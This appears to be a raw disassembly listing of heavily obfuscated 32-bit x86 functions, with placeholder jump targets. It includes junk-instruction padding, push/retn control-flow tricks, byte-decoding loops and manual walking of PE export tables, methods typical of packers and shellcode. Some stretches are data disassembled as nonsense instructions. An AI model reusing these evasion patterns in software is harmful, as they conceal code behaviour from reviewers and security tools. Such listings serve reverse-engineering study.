sub_1003f132
push [ esp ]
lea esp [ esp + 0x48 ]
jae rwxdata
pushad
jmp rwxdata
btr di bx
pushad
mov ebx eax
bt ecx 0x1a
not di
lea esp [ esp + 0x20 ]
jb rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
rol di 0x1
mov edi eax
btr cx 0x8
mov ecx 0x104
clc
sub al al
bt sp 0xf
stc
[ edi ]
call sub_10041eb8
cmp ecx esp
pushad
cmc
cmp al 0x9
push [ esp + 0x8 ]
lea esp [ esp + 0x28 ]
ja rwxdata
bsr cx bp
mov edi eax
rcl ecx cl
bts cx dx
adc cx 0xab2b
mov ecx 0x104
jmp rwxdata
push 0xfc5e96f0
mov esp esi
pushfd
mov [ esp ] ch
pushad
pushad
lea esp [ esp + 0x44 ]
jmp rwxdata
pushad
push 0x9bf43129
stc
imul edx edx 0xa
push 0xf67cbc84
add edx eax
pushfd
lea esp [ esp + 0x2c ]
jmp rwxdata
bt sp 0xc
call sub_1005ce02
or dh al
sub eax eax
pushfd
lea esp [ esp + 0x4 ]
jmp rwxdata
sub al 0xf5
or al cl
mov al bl
and al 0x38
add edi 0x1
mov al 0x90
mov al [ edi ]
stc
clc
test al ah
pushfd
test al al
pushad
lea esp [ esp + 0x24 ]
je rwxdata
movsx di al
movzx cx cl
pushad
mov edi edx
lea esp [ esp + 0x20 ]
cmc
btr cx 0x8
clc
mov ecx edi
push 0x6c2d4cd6
jmp rwxdata
pushfd
test dh ch
cmp bl bl
sub al 0x30
push [ esp ]
cmp al 0x9
pushad
mov [ esp + 0xc ] 0xbd
lea esp [ esp + 0x28 ]
ja rwxdata
mov al [ ecx ]
call sub_10077273
clc
imul edx edx 0xa
jmp rwxdata
cmc
cmp cl dh
clc
add edx eax
sub_1003f238
lea esp [ esp + 0x28 ]
jne rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
stc
mov ecx edi
not esi
sar si cl
sbb si cx
not esi
sub ecx ebx
sbb si 0x4e73
adc si si
mov esi esp
pushfd
clc
sub edi 0x4
mov [ esp ] bp
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
call sub_100440a4
sub_10040bec
add ecx [ ebp - 0x4 ]
xadd si di
and si cx
shr ecx 0x1
push edx
sub esp 0xfffffff4
jg rwxdata
or si ax
jmp rwxdata
bts si 0x1
mov edi [ ebx + ecx * 4 ]
rol si cl
bsr si ax
add edi eax
movzx si cl
pushfd
call sub_1006ad2c
mov edi [ ebx + ecx * 4 ]
bsf esi esp
bt ebx ebp
add edi eax
call sub_10044ffa
sub_100412e3
lea esp [ esp + 0x28 ]
je rwxdata
movsx di al
movzx cx cl
pushad
mov edi edx
lea esp [ esp + 0x20 ]
cmc
btr cx 0x8
clc
mov ecx edi
push 0x6c2d4cd6
jmp rwxdata
stc
sub al 0x30
jmp rwxdata
mov al [ ecx ]
call sub_10077273
jmp rwxdata
pushfd
bt si 0xb
cmp al 0x9
jmp rwxdata
lea esp [ esp + 0x4 ]
ja rwxdata
push 0xfc5e96f0
mov esp esi
pushfd
mov [ esp ] ch
pushad
pushad
lea esp [ esp + 0x44 ]
jmp rwxdata
push esp
imul edx edx 0xa
sub esp 0xfffffffc
je rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
test dl 0x0
add edx eax
pushfd
pushad
mov [ esp + 0x10 ] eax
lea esp [ esp + 0x24 ]
jmp rwxdata
add edx eax
pushad
mov [ esp + 0x14 ] al
mov [ esp + 0x4 ] ch
mov [ esp ] 0x9f
lea esp [ esp + 0x20 ]
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub al 0xf5
or al cl
mov al bl
and al 0x38
add edi 0x1
mov al 0x90
mov al [ edi ]
stc
clc
test al ah
pushfd
test al al
pushad
lea esp [ esp + 0x24 ]
je rwxdata
pushfd
test dh ch
cmp bl bl
sub al 0x30
push [ esp ]
cmp al 0x9
pushad
mov [ esp + 0xc ] 0xbd
lea esp [ esp + 0x28 ]
ja rwxdata
clc
imul edx edx 0xa
jmp rwxdata
cmc
cmp cl dh
clc
add edx eax
pushfd
lea esp [ esp + 0x4 ]
jmp rwxdata
sub_1004136f
mov [ esp ] 0x5e603d6
xor al al
cmc
pushfd
mov [ esp + 0x4 ] di
[ edi ]
mov [ esp + 0x4 ] bh
pushad
lea esp [ esp + 0x28 ]
jne rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
bt di dx
cmp ax 0xa765
movsx esi bl
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
mov ecx edi
neg esi
inc si
sub ecx ebx
bt ax sp
bts esi ebp
dec esi
bswap si
mov esi esp
cmp dh 0xbb
cmp si 0xd6b3
sub edi 0x4
pushad
pushad
call sub_10065a55
sub_100413db
lea esp [ esp + 0x10 ]
jne rwxdata
push 0xfc5e96f0
mov esp esi
pushfd
mov [ esp ] ch
pushad
pushad
lea esp [ esp + 0x44 ]
jmp rwxdata
pushad
mov [ esp + 0x4 ] ebp
mov [ edi - 0x1 ] 0x0
pop eax
pushad
mov [ esp + 0x38 ] ebx
jmp rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
movsx ax dl
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
lahf
lea eax [ rwxdata ]
jmp rwxdata
push ebp
jmp rwxdata
jmp rwxdata
mov [ esp + 0x38 ] rwxdata
mov [ esp ] 0x24
push [ esp ]
mov [ esp ] al
mov [ esp + 0x38 ] eax
mov [ esp + 0x8 ] bl
mov [ esp + 0x8 ] ah
push [ esp + 0x38 ]
retn 0x3c
sub_1004198d
push esi
lea esp [ esp + 0x8 ]
je rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
sbb dh 0xec
mov esi [ eax + 0x3c ]
rcr dl 0x1
add esi eax
and edx 0x3204648d
btc dx 0xa
mov edx [ esi + 0x78 ]
test ebp edx
pushad
test edx edx
pushad
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
lea esp [ esp + 0x40 ]
je rwxdata
btc cx ax
call sub_100634c2
sub_10041eb8
pushfd
lea esp [ esp + 0x8 ]
jne rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
bts cx dx
bt bp 0xd
mov ecx edi
rol esi 0x1d
test dh ah
rcr si 0x9
sub ecx ebx
sbb si ax
shl si cl
mov esi esp
pushad
sub edi 0x4
test cl ah
push [ edi ]
pop [ esp + 0x1c ]
bt di dx
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
mov [ esp + 0x4 ] 0x2
mov [ esp ] ah
cmp edi ebx
mov [ esp + 0xc ] 0x9b
jmp rwxdata
pushfd
lea esp [ esp + 0x20 ]
ja rwxdata
cmp dh 0xbb
cmp si 0xd6b3
sub edi 0x4
pushad
pushad
call sub_10065a55
adc al 0xb1
sub ebx edi
jmp sub_10063b1d
sub_10042727
pushfd
adc al al
jmp rwxdata
pushad
mov [ esp + 0xc ] 0x2d29
lea esp [ esp + 0x28 ]
jae rwxdata
call j_sub_1005d07a
push 0x7d370697
pushad
pushad
pushfd
lea esp [ esp + 0x48 ]
jne rwxdata
cmp bl 0xf0
push esi
sub si 0x7e6d
not esi
movzx si bl
lea esi [ esp - 0x1a9f955 ]
mov esi edi
clc
jmp sub_1005ce4d
pushad
mov [ esp ] 0x1e
call sub_10063493
sub_1004273d
test ah ah
pushfd
push 0x444ddca3
jmp rwxdata
jmp rwxdata
lea esp [ esp + 0x3c ]
jne rwxdata
push 0x6c2d4cd6
jmp rwxdata
push 0x821180ef
call sub_10044d35
mov al [ ecx ]
call sub_10077273
sub_10042ca9
lea esp [ esp + 0x44 ]
jpe rwxdata
pushad
pushad
mov esp ebp
bswap bp
pushad
mov ebp [ esp + 0x20 ]
pushfd
push edi
mov [ esp ] dx
push [ esp + 0x2c ]
retn 0x40
push 0x703eae03
push 0x8665b1e0
mov esp ebp
lea ebp [ ebp - 0x3c13fde3 ]
lea ebp [ eax - 0x38c9402b ]
movsx bp dl
pop ebp
pushad
push [ esp + 0x20 ]
retn 0x34
sub_1004366f
test al 0xa0
stc
cmp ebx 0x2
push [ esp ]
mov [ esp ] 0x5c
push 0x65e1ca34
push [ esp ]
lea esp [ esp + 0x10 ]
je rwxdata
add bx 0x2b9e
clc
mov bx [ esi ]
stc
call sub_10042c89
pushfd
cmp ebx 0x3
jmp sub_10064360
sub_10043955
push [ esp ]
pushfd
lea esp [ esp + 0x4c ]
ja rwxdata
cmp dh 0xbb
cmp si 0xd6b3
sub edi 0x4
pushad
pushad
call sub_10065a55
cmp ebp 0x54f1f839
pushad
not al
bt bp ax
sub ebx edi
setbe al
shrd di bp cl
add esp 0x20
add ebx esp
adc al 0x7
and al 0x7f
mov edi ebx
and al 0xf7
neg al
inc al
rcr al 0x4
mov al 0x2e
pushad
bt bp dx
[ edi ]
mov [ esp + 0x4 ] 0x6d4f
pushfd
pushad
lea esp [ esp + 0x44 ]
jne rwxdata
push 0xfc5e96f0
mov esp esi
pushfd
mov [ esp ] ch
pushad
pushad
lea esp [ esp + 0x44 ]
jmp rwxdata
movsx ax cl
movzx ax bl
not eax
jmp rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
mov [ edi - 0x1 ] 0x0
lahf
lea eax [ eax + 0x1deff11f ]
call sub_100634a4
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub_10043e6d
bt sp dx
sub al 0x30
jmp rwxdata
cmp ecx esp
pushad
cmc
cmp al 0x9
push [ esp + 0x8 ]
lea esp [ esp + 0x28 ]
ja rwxdata
push 0xfc5e96f0
mov esp esi
pushfd
mov [ esp ] ch
pushad
pushad
lea esp [ esp + 0x44 ]
jmp rwxdata
pushad
push 0x9bf43129
stc
imul edx edx 0xa
push 0xf67cbc84
add edx eax
pushfd
lea esp [ esp + 0x2c ]
jmp rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
pushfd
lea esp [ esp + 0x4 ]
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub al 0xf5
or al cl
mov al bl
and al 0x38
add edi 0x1
mov al 0x90
mov al [ edi ]
stc
clc
test al ah
pushfd
test al al
pushad
lea esp [ esp + 0x24 ]
je rwxdata
movsx di al
movzx cx cl
pushad
mov edi edx
lea esp [ esp + 0x20 ]
cmc
btr cx 0x8
clc
mov ecx edi
push 0x6c2d4cd6
jmp rwxdata
pushfd
test dh ch
cmp bl bl
sub al 0x30
push [ esp ]
cmp al 0x9
pushad
mov [ esp + 0xc ] 0xbd
lea esp [ esp + 0x28 ]
ja rwxdata
mov al [ ecx ]
call sub_10077273
clc
imul edx edx 0xa
jmp rwxdata
cmc
cmp cl dh
clc
add edx eax
sub_100440a4
clc
push [ edi ]
pop [ esp + 0x4 ]
pushad
cmc
bt di 0x1
cmp edi ebx
mov [ esp ] dx
pushad
pushfd
lea esp [ esp + 0x48 ]
ja rwxdata
cmp dh 0xbb
cmp si 0xd6b3
sub edi 0x4
pushad
pushad
call sub_10065a55
clc
sub ebx edi
shld di sp 0xa
add ebx esp
mov edi edx
bt edx edi
mov edi ebx
pushad
inc al
ror al 0x1
mov al 0x2e
mov [ esp + 0xc ] 0xa5b5
[ edi ]
jmp rwxdata
pushfd
jmp rwxdata
lea esp [ esp + 0x24 ]
jne rwxdata
push 0xfc5e96f0
mov esp esi
pushfd
mov [ esp ] ch
pushad
pushad
lea esp [ esp + 0x44 ]
jmp rwxdata
lahf
mov [ edi - 0x1 ] 0x0
pushad
lahf
push 0xffa6a81a
mov [ esp + 0x20 ] ebx
pop eax
call sub_10041715
or dh al
sub eax eax
pushad
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub_10044708
pushad
cmp bh 0xf8
jmp rwxdata
cmp eax edx
mov [ esp ] bp
jmp rwxdata
lea esp [ esp + 0x44 ]
jb rwxdata
pushad
jmp rwxdata
pushfd
test bh 0x67
clc
test ah 0x73
cmp eax [ ebp - 0x10 ]
pushfd
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
pushfd
lea esp [ esp + 0xc ]
jae rwxdata
and bx 0x3bde
shld ecx edi cl
ror bl cl
movzx ebx al
mov ebx eax
movzx di cl
mov edi eax
jmp rwxdata
mov ecx 0x104
call j_sub_100658d8
sub_10044966
sub esp 0xfffffffc
jpe rwxdata
test bh 0x66
test dl bl
cmp al 0x4f
clc
cmp ebx 0x3
jg rwxdata
clc
cmp ebx 0x3
push ecx
pushad
pushad
mov [ esp ] 0xd45c
lea esp [ esp + 0x44 ]
je rwxdata
pushfd
pushfd
lea esp [ esp + 0x8 ]
je rwxdata
pushad
pushfd
pushad
lea esp [ esp + 0x44 ]
je rwxdata
bt ebp ecx
mov bx [ esi ]
pushad
clc
stc
and ebx 0xfff
stc
jmp rwxdata
pushfd
mov [ esp ] bl
pushfd
mov [ esp + 0x4 ] ah
lea esp [ esp + 0x8 ]
jmp rwxdata
pushfd
lea esp [ esp + 0x4 ]
jmp rwxdata
push ebx
push 0x50d0872f
pushad
lea esp [ esp + 0x28 ]
jmp rwxdata
jmp rwxdata
cmp al 0xd2
pushad
clc
add esi 0x2
jmp rwxdata
cmp dh 0xcb
add [ ebx + edi ] edx
lea esp [ esp + 0x20 ]
call sub_1006708a
sub_10044cb6
sub al 0xdd
lea esp [ esp + 0x10 ]
jge rwxdata
jmp rwxdata
ror al 0x3
pushad
call sub_1006467f
clc
ror al 0x3
bt sp 0x8
clc
sub al 0x61
push eax
lea esp [ esp + 0x4 ]
call j_sub_10041c02
sub_10044cea
push 0xd2b0f02d
mov [ edi - 0x1 ] 0x0
mov [ esp + 0x8 ] 0x8521
pushfd
mov [ esp + 0xc ] ebx
bswap eax
pop eax
lea eax [ rwxdata ]
call sub_1003f111
pushad
lea esi [ ebp - 0x4510233b ]
mov esi [ esp + 0x24 ]
pushfd
pushfd
lea esp [ esp + 0x30 ]
jmp rwxdata
call sub_100668e2
sub_1005ce02
sub al al
mov [ esp ] 0x75fe
test si dx
[ edi ]
mov [ esp ] 0x9c
push [ esp ]
mov [ esp ] 0x4c
jmp rwxdata
lea esp [ esp + 0x8 ]
jne rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
rol si 0x9
sar cx cl
or ecx edi
mov ecx edi
call sub_1005d8aa
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub_1005ce59
mov [ esp + 0x4 ] 0x9b
lea esp [ esp + 0xc ]
call sub_100419c9
pushfd
push esi
lea esp [ esp + 0x8 ]
jae rwxdata
jmp rwxdata
call sub_100674e7
lodsb [ esi ]
pushfd
neg bl
xor bl cl
pushad
xor al 0xb3
cmp bx si
sub al 0xdd
rcl bl cl
stc
bt bp bp
ror al 0x3
shl bl cl
sbb bl 0x2f
sub al 0x61
not bl
stosb [ edi ]
push eax
pushfd
jmp rwxdata
mov bl 0x2
lea esp [ esp + 0x2c ]
call sub_100668e2
sub_1005ce9a
mov [ esp + 0x4 ] bh
lea esp [ esp + 0xc ]
jae rwxdata
pushad
jmp rwxdata
setbe bl
movsx cx cl
or bh 0x62
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
mov ebx eax
bsf cx cx
ror cx 0x5
bt si si
call sub_10043656
sub_1005d036
pushad
push 0xc7c2226f
mov [ esp + 0x28 ] 0x60fb0e6a
push 0x7f61da66
push edi
mov [ esp + 0x4 ] 0xd5
lea esp [ esp + 0x30 ]
jmp rwxdata
jmp rwxdata
pushfd
pushad
mov [ esp ] 0x62e7
mov [ esp + 0x20 ] eax
push 0x494ef5fb
mov [ esp + 0x20 ] ebx
jmp rwxdata
push ebp
mov [ esp + 0x20 ] esi
pushfd
push [ esp ]
mov [ esp ] bh
mov [ esp + 0x24 ] ebp
pushad
pushfd
mov [ esp ] ch
mov [ esp + 0x44 ] edx
push 0x64406dd
jmp rwxdata
push [ esp ]
pushfd
mov [ esp + 0x4c ] esi
pushfd
mov [ esp ] 0x77
mov [ esp + 0x4c ] edi
pushfd
mov [ esp ] ecx
mov [ esp + 0x14 ] 0xf09d
lea esp [ esp + 0x50 ]
jmp rwxdata
lea edi [ ebp + 0x63f42afc ]
push ecx
push edx
pushfd
pop [ esp ]
xchg bp si
push [ rwxdata ]
mov si bp
bswap si
xchg bp si
push 0x0
mov si 0x7e1e
movsx edi cl
mov esi [ esp + 0x30 ]
push ecx
inc esi
rcl bp cl
rol esi 0xe
movsx bx al
push esp
call sub_1007982d
sub_1005d0b8
cmp eax edx
mov [ esp + 0x4 ] bl
mov [ esp + 0x4 ] dh
lea esp [ esp + 0x28 ]
jb rwxdata
pushad
jmp rwxdata
push 0xaad347f5
pushfd
test cx dx
cmp eax [ ebp - 0x10 ]
pushfd
pushfd
lea esp [ esp + 0x10 ]
jae rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
push ebp
mov [ esp ] 0xaf039f8d
pushfd
mov ebx eax
pushad
mov edi eax
bswap cx
lea ecx [ edx + 0x5fe0b92f ]
mov ecx 0x104
mov [ esp ] 0xba
lea esp [ esp + 0x28 ]
jmp rwxdata
call j_sub_1004136f
sub_1005d11a
push 0x1b6f8a6d
push 0x8dd81e25
dec al
pushad
lea esp [ esp + 0x3c ]
je rwxdata
pushad
rol al 0x2
bt eax 0x15
pushfd
stc
neg al
test dh 0x13
stc
cmp dl dh
not al
push edi
mov [ ecx ] al
call sub_10066ce4
rol al 0x2
pushfd
cmc
mov [ esp ] al
cmc
neg al
cmc
cmp bp si
cmc
not al
pushad
jmp rwxdata
test esp eax
pushad
mov [ ecx ] al
stc
add ecx 0x1
pushfd
cmc
test ah ah
call sub_1004419c
sub_1005d577
pushfd
lea esp [ esp + 0x28 ]
jne rwxdata
call sub_10041d30
sar edi cl
cmp bh dl
rcr di 0x3
mov edi [ edx + 0x24 ]
bt si 0xa
pushfd
cmp ax bp
cmc
add edi eax
pushad
stc
mov [ esp ] ax
push 0x20753bc0
movzx ecx [ edi + ecx * 2 ]
shrd edi ebp 0x13
pushfd
btc edi 0x12
dec di
mov edi [ edx + 0x1c ]
bt cx bx
jmp rwxdata
bt cx 0x2
add edi eax
pushfd
clc
stc
mov edi [ edi + ecx * 4 ]
mov [ esp ] 0xad
pushfd
call sub_10044fa2
sub_1005d75c
mov bl 0x7
inc ecx
lea esp [ esp + 0x24 ]
stc
shl bl 0x1
sbb bl 0x30
dec bl
xchg ebp eax
ror bl 0x6
shl bl 0x1
neg bl
mov eax ebp
test bx bx
sbb bl 0x49
stc
mov bl 0x1
cmp bl 0xf0
push esi
sub si 0x7e6d
not esi
movzx si bl
lea esi [ esp - 0x1a9f955 ]
mov esi edi
clc
jmp sub_1005ce4d
sub_1005d8aa
sub ecx ebx
rcl si cl
cmc
movzx si al
lea esi [ esp + 0x4 ]
test cx dx
pushfd
sub edi 0x4
stc
cmc
push [ edi ]
pop [ esp + 0x4 ]
pushfd
pushfd
pushfd
jmp rwxdata
cmp edi ebx
pushad
lea esp [ esp + 0x30 ]
ja rwxdata
cmp dh 0xbb
cmp si 0xd6b3
sub edi 0x4
pushad
pushad
call sub_10065a55
stc
mov al bl
not al
sub ebx edi
sbb al 0x7c
bts di bp
add ebx esp
cmp bp 0xd22c
stc
call sub_10060adb
pushfd
call sub_1006ab68
sub_1005db40
pushad
mov edi [ esp + 0x28 ]
not bp
push ecx
xchg ebp esi
jmp rwxdata
mov esi [ esp + 0x30 ]
lea esp [ esp + 0x34 ]
jb rwxdata
pushfd
lea ebp [ ecx + 0x4d6ddc47 ]
pushad
not bp
mov ebp [ esp + 0x24 ]
pushfd
pushfd
push [ esp ]
push 0xe1345b3a
push [ esp + 0x38 ]
retn 0x44
pop ebp
pushad
pushfd
push [ esp + 0x24 ]
retn 0x30
sub_1005dc38
movzx ecx [ edi + ecx * 2 ]
sbb di 0x9fb0
mov edi [ edx + 0x1c ]
cmp ch dl
push [ esp ]
pushfd
add edi eax
mov [ esp + 0x8 ] si
pushfd
pushfd
mov edi [ edi + ecx * 4 ]
stc
test edi edi
pushfd
jmp rwxdata
jmp rwxdata
pushfd
lea esp [ esp + 0x44 ]
je rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
call j_sub_10064266
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub_1006083b
lea esp [ esp + 0x4 ]
jb rwxdata
test di bp
cmp ecx [ ebp - 0x8 ]
push ecx
lea esp [ esp + 0x4 ]
jbe rwxdata
stc
call sub_10067767
or dh al
sub eax eax
pushad
jmp rwxdata
clc
sub ecx 0x1
shld esi edi cl
neg si
bswap di
dec esi
mov [ ebp - 0x4 ] ecx
call sub_10060da9
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub_10060adb
mov edi ebx
dec al
sar al 0x2
mov al 0x2e
push [ esp ]
jmp rwxdata
cmc
pushfd
[ edi ]
push [ esp + 0x4 ]
pushad
jmp rwxdata
lea esp [ esp + 0x30 ]
jne rwxdata
push 0xfc5e96f0
mov esp esi
pushfd
mov [ esp ] ch
pushad
pushad
lea esp [ esp + 0x44 ]
jmp rwxdata
push eax
not al
pushfd
movzx ax al
mov [ edi - 0x1 ] 0x0
movsx ax bl
setbe ah
mov [ esp + 0x4 ] ebx
pop eax
pushad
pushfd
lea eax [ rwxdata ]
push [ esp ]
mov [ esp ] 0x2ace3a50
mov [ esp + 0x24 ] rwxdata
push [ esp + 0x8 ]
pushfd
push [ esp + 0x4 ]
mov [ esp + 0x2c ] eax
push 0xfbc825ef
push [ esp + 0x30 ]
retn 0x34
or dh al
sub eax eax
pushad
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub_10060aec
lea esp [ esp + 0x10 ]
jbe rwxdata
stc
bt sp si
sub ecx [ edx + 0x10 ]
push edx
pushad
cmp ecx [ edx + 0x14 ]
push [ esp ]
jmp rwxdata
bsf bx bx
sbb di 0xa754
mov edi [ edx + 0x24 ]
call sub_1006823d
lea esp [ esp + 0x28 ]
jae rwxdata
or dh al
sub eax eax
push ebx
push 0x8080526c
mov [ esp + 0x4 ] al
pushfd
lea esp [ esp + 0xc ]
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub edi 0x2087d37
mov edi [ edx + 0x1c ]
pushfd
add edi eax
bt esp ebx
push [ esp ]
sub esp 0xfffffff8
jl rwxdata
cmc
mov edi [ edi + ecx * 4 ]
clc
test edi edi
push 0x325475bd
lea esp [ esp + 0x4 ]
je rwxdata
mov edi [ edi + ecx * 4 ]
push 0xdb8b4f51
cmp al 0xe2
clc
clc
test edi edi
push [ esp ]
pushfd
lea esp [ esp + 0xc ]
je rwxdata
stc
call sub_1005d937
pushfd
pushfd
add eax edi
mov [ esp + 0x4 ] cl
stc
cmp eax edx
pushad
pushfd
pushfd
lea esp [ esp + 0x30 ]
jb rwxdata
pushad
jmp rwxdata
push 0xb399fcc3
cmp eax [ ebp - 0x10 ]
pushfd
call j_sub_1005ce9a
sub_10060d95
lahf
push ebp
cmp dl ah
and ebp eax
mov ebp esp
clc
sub esp 0x18
mov ah 0xda
jmp rwxdata
push esi
cmp edx edx
jmp rwxdata
mov eax esp
push edi
clc
bsr ax bx
push ebx
bts ax 0xc
push edx
add ah 0x6e
mov ah 0x6
mov eax [ ebp + 0x8 ]
stc
test eax eax
call j_sub_1004198d
sub_100634c2
pushfd
add edx eax
mov [ esp + 0x4 ] 0x4d
xor cl 0x5
mov ecx [ esi + 0x7c ]
lea esp [ esp + 0x8 ]
js rwxdata
bt esp 0xa
cmp dl 0x4d
bt sp 0x5
add ecx edx
test bl bl
mov [ ebp - 0x10 ] ecx
not ch
xor cx 0xcde5
mov ecx [ ebp + 0xc ]
test di 0x3c10
pushfd
pushfd
pushfd
cmp ecx 0xffff
call j_sub_10060aec
add ecx edx
cmc
clc
mov [ ebp - 0x10 ] ecx
neg ecx
pushfd
mov ecx [ ebp + 0xc ]
jmp sub_100418c1
sub_10063b1d
cmp dh 0x7b
neg al
stc
add ebx esp
bts di 0x1
mov edi ebx
rcr al cl
mov al 0x2e
cmp dl 0x7d
push esi
[ edi ]
pushfd
push 0xce629152
mov [ esp ] dl
lea esp [ esp + 0xc ]
jne rwxdata
push 0xfc5e96f0
mov esp esi
pushfd
mov [ esp ] ch
pushad
pushad
lea esp [ esp + 0x44 ]
jmp rwxdata
cwde
cwde
mov [ edi - 0x1 ] 0x0
pushad
push 0x16043e23
push [ esp + 0x10 ]
mov [ esp + 0x24 ] ebx
pushfd
jmp rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
pushfd
mov ax 0xe803
lea eax [ rwxdata ]
mov [ esp + 0xc ] bp
mov [ esp + 0x8 ] bh
mov [ esp + 0x28 ] rwxdata
mov [ esp + 0x8 ] 0x49
pushfd
call sub_10062f41
test al 0x52
pop ds
lds ebp [ eax + eax * 2 ]
push edx
0xbc42cc2f 0xf802
dec esi
fdivr [ esi + 0x74 ]
shl [ edx + edi * 8 ] cl
stosb [ edi ]
push eax
sbb [ esi + 0x7640ea6c ] cl
mov al 0xde
and [ esi + 0x63207168 ] bh
outsd
sbb bh ch
and eax 0x40c6347d
pop edx
mov bh 0xce
ja rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
add [ ecx + ecx * 4 - 0x3c ] dl
ja rwxdata
loop rwxdata
mov edi 0x25cd5a4b
cld
mov eax 0x54a628c6
push cs
mov edx 0x3e552063
dec eax
lodsb [ si ]
pop es
inc eax
fistp [ eax + 0x30 ]
dec edx
inc ecx
inc edi
xchg edi eax
cli
or [ esi - 0x4c ] ch
call 0x62fa0b95
stosb [ edi ]
not [ ebp + 0x1097321c ]
fwait
sbb eax edx
0x137b
push edx
sub_10064110
lea esp [ esp + 0x48 ]
je rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
pushad
cmp cx bp
mov [ esp ] ch
add eax edi
call sub_10044708
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub_1006414a
add edx eax
mov [ esp ] 0x18
pushad
push [ esp + 0x4 ]
lea esp [ esp + 0x28 ]
jmp rwxdata
pushfd
lea esp [ esp + 0x4 ]
jmp rwxdata
sub al 0xf5
or al cl
mov al bl
and al 0x38
add edi 0x1
mov al 0x90
mov al [ edi ]
stc
clc
test al ah
pushfd
test al al
pushad
lea esp [ esp + 0x24 ]
je rwxdata
movsx di al
movzx cx cl
pushad
mov edi edx
lea esp [ esp + 0x20 ]
cmc
btr cx 0x8
clc
mov ecx edi
push 0x6c2d4cd6
jmp rwxdata
pushfd
test dh ch
cmp bl bl
sub al 0x30
push [ esp ]
cmp al 0x9
pushad
mov [ esp + 0xc ] 0xbd
lea esp [ esp + 0x28 ]
ja rwxdata
mov al [ ecx ]
call sub_10077273
push 0xfc5e96f0
mov esp esi
pushfd
mov [ esp ] ch
pushad
pushad
lea esp [ esp + 0x44 ]
jmp rwxdata
clc
imul edx edx 0xa
jmp rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
cmc
cmp cl dh
clc
add edx eax
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub_10064266
pushad
test ch bl
add eax edi
cmc
mov [ esp ] cl
cmp eax edx
pushad
lea esp [ esp + 0x44 ]
jb rwxdata
pushad
jmp rwxdata
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
bt dx 0x2
cmp eax [ ebp - 0x10 ]
push eax
lea esp [ esp + 0x4 ]
jae rwxdata
pushfd
movsx bx bl
mov ebx eax
mov cx cx
pop ecx
mov edi eax
lea ecx [ edi + 0x5477cdbb ]
mov ecx 0x104
pushad
push [ esp ]
push [ esp + 0x4 ]
lea esp [ esp + 0x28 ]
jmp rwxdata
call j_sub_1004136f
sub_10064360
push [ esp ]
push 0xa6f180e5
lea esp [ esp + 0xc ]
je rwxdata
bt ebp ecx
mov bx [ esi ]
pushad
clc
stc
and ebx 0xfff
stc
jmp rwxdata
pushad
pushad
lea esp [ esp + 0x40 ]
jmp rwxdata
jmp rwxdata
cmp al 0xd2
pushad
clc
add esi 0x2
jmp rwxdata
cmp dh 0xcb
add [ ebx + edi ] edx
lea esp [ esp + 0x20 ]
call sub_1006708a
sub_1006437d
mov esp ebp
mov bp 0x88a
push 0x1e420fd3
call sub_1005d068
aaa
sbb eax 0x42470591
push edx
xchg ebx eax
cwde
fdivr [ esi - 0x80 ]
jpe rwxdata
cmpsd [ esi ] [ edi ]
loope rwxdata
retn 0xfa54
pop ss
imul ebx ecx 0x5fee7351
cli
mov esi 0x778c1f9c
or [ 0xffffffffc3ce6b01 ] ebx
inc edi
0x523b013e 0x5582
hlt
sub_10064484
lea esp [ esp + 0xc ]
jne rwxdata
cmp bl 0xf0
push esi
sub si 0x7e6d
not esi
movzx si bl
lea esi [ esp - 0x1a9f955 ]
mov esi edi
clc
jmp sub_1005ce4d
jmp rwxdata
jmp rwxdata
pushad
stosb [ edi ]
mov [ esp + 0x8 ] bx
lea esp [ esp + 0x20 ]
jmp rwxdata
call sub_100668e2
sub_10064642
lea esp [ esp + 0x4 ]
jb rwxdata
push 0x83336343
pushad
push 0x269c29e1
mov [ esp + 0x4 ] 0x82
lea esp [ esp + 0x28 ]
call sub_100419c9
pushad
mov [ esp ] 0x6
mov [ esp + 0x4 ] 0x9e
adc ecx ecx
pushad
call sub_10065ce2
push 0x3b829470
mov [ esp ] 0xa9c8
push [ esp + 0x4 ]
retn 0x8
sub_1006468b
lea esp [ esp + 0x8 ]
ja rwxdata
jmp rwxdata
mov ch dl
pop esi
pushfd
mov edi [ esp + 0x4 ]
bswap ebx
seta bl
call sub_100658bf
neg ch
mov ecx [ esi + 0x4 ]
pushad
jmp rwxdata
or ecx ecx
pushad
mov [ esp ] 0xf0
